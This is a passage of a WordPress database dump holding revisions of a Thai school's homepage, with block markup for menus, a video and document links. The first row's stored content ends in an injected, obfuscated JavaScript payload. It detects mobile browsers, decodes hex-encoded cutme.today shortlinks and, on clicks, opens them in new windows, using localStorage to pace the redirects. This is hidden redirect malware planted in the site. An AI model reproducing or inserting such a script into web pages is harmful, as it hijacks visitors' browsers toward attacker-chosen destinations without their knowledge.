)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','19-revision-v1','','','2024-08-23 14:27:35','2024-08-23 07:27:35','',19,'http://watprato.ssk.in.th/?p=201',0,'revision','',0),
(203,2,'2024-08-23 14:28:42','2024-08-23 07:28:42','<!-- wp:kadence/rowlayout {\"uniqueID\":\"19_238a19-ce\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"19_55c486-08\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column19_55c486-08\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"afb41c1a\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"f1b9a3f2\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"41ac449a\",\"mediaId\":85,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-41ac449a\"><img class=\"gb-image gb-image-41ac449a\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/awpt.gif\" alt=\"\" title=\"awpt\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":46,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/นายอนุศักดิ์-พันธ์งาม-png.png\" alt=\"\" title=\"นายอนุศักดิ์ พันธ์งาม png\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"19_66bc98-69\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns19_66bc98-69\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"19_3d590e-59\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"sizePreset\":\"small\",\"background\":\"#cf2e2e\",\"backgroundHover\":\"#f78da7\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"19_c72802-2d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items19_c72802-2d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"19_152c5d-2f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_152c5d-2f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_3cadef-91\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_3cadef-91\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_d4147b-0f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_d4147b-0f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_41d84f-8e\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_41d84f-8e\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_17cef9-da\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_17cef9-da\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลผู้บริหาร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_a997a3-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_a997a3-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลบุคลากร</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_13660f-b9\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_13660f-b9\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลนักเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"19_702c0e-e7\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-19_702c0e-e7\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูล O-NET</span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/grid {\"uniqueId\":\"b3b3ab6e\",\"columns\":2,\"horizontalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"10b33923\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/headline {\"uniqueId\":\"1d4269e0\",\"blockVersion\":3,\"typography\":{\"textAlignMobile\":\"center\",\"fontSize\":\"22px\"},\"spacing\":{\"marginBottom\":\"10px\"}} -->\n<h2 class=\"gb-headline gb-headline-1d4269e0 gb-headline-text\"><strong>VTR กิจกรรมโรงเรียน</strong></h2>\n<!-- /wp:generateblocks/headline -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"f57e2371\",\"isGrid\":true,\"gridId\":\"b3b3ab6e\",\"isDynamic\":true,\"blockVersion\":4,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"typography\":{\"textAlign\":\"right\",\"textAlignMobile\":\"center\"},\"spacing\":{\"paddingBottomMobile\":\"10px\"}} -->\n<!-- wp:generateblocks/button {\"uniqueId\":\"48e80028\",\"hasUrl\":true,\"blockVersion\":4,\"display\":\"inline-flex\",\"typography\":{\"fontSize\":\"14px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"6px\",\"paddingRight\":\"15px\",\"paddingBottom\":\"6px\",\"paddingLeft\":\"15px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\"} -->\n<a class=\"gb-button gb-button-48e80028 gb-button-text\" href=\"https://www.facebook.com/profile.php?id=61556083436494&amp;sk=videos\"><strong>คลัง VTR  โรงเรียนทั้งหมด</strong></a>\n<!-- /wp:generateblocks/button -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n\n<!-- wp:video {\"id\":64,\"align\":\"center\"} -->\n<figure class=\"wp-block-video aligncenter\"><video controls poster=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/VTR-แนะนำโรงเรียน.png\" src=\"http://watprato.ssk.in.th/wp-content/uploads/2024/07/วันครู-1.mp4\"></video></figure>\n<!-- /wp:video --></div>\n<!-- /wp:group -->\n\n<!-- wp:contentviews/list1 {\"blockId\":\"0i8f2on2\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showThumbnail\":false,\"showTaxonomy\":false,\"taxoPosition\":\"over_top_left\",\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaSeparator\":\"|\",\"showPagination\":true,\"thumbnailMaxWidth\":{\"md\":35},\"thumbnailHeight\":{\"md\":170},\"thumbnailEffect\":\"cveffect-darken\",\"excerptLength\":\"10\",\"postsPerPage\":\"3\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"meta-fieldsMargin\":{\"md\":{\"top\":\"-10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\"}},\"meta-fieldsPadding\":{\"md\":{\"top\":\"-10\",\"bottom\":\"-10\"}},\"headingBgColor\":\"#cf2e2e\",\"headingWeight\":\"500\",\"headingBorderColor\":\"#f78da7\",\"headingfSize\":{\"md\":20},\"thumbnailAllBorderRadius\":{\"md\":{\"top\":\"3\",\"right\":\"3\",\"bottom\":\"3\",\"left\":\"3\"}},\"titleWeight\":\"500\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":17},\"titleLine\":{\"md\":30},\"titleMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"titlePadding\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"titleBorderRadius\":{\"md\":{\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\"}},\"readmoreBgColor\":\"#6096b4\",\"readmoreMargin\":{\"md\":{\"top\":\"\",\"right\":\"10\",\"bottom\":\"\",\"left\":\"10\"}},\"paginationMargin\":{\"md\":{\"bottom\":\"-40\",\"top\":\"-20\",\"right\":\"10\",\"left\":\"10\"}}} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"https://drive.google.com/file/d/14sI1pHQ6FFaNHMgoK3-29HJ5-OSuA8MD/view?usp=drive_link\" data-type=\"page\" data-id=\"19\">โครงสร้าง</a></strong></td></tr><tr><td><strong>ข้อมูลผู้บริหาร</strong></td></tr><tr><td><strong>อำนาจหน้าที่</strong></td></tr><tr><td><strong>ข้อมูลการติดต่อ</strong></td></tr><tr><td><strong>ข่าวประชาสัมพันธ์</strong></td></tr><tr><td><strong>Q&amp;A</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้จ่ายงบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong>E-Service</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#cf2e2e\",\"backgroundColorHover\":\"#f78da7\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการบริหารและพัฒนาทรัพยากรบุคคล</strong></td></tr><tr><td><strong>รายงานการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 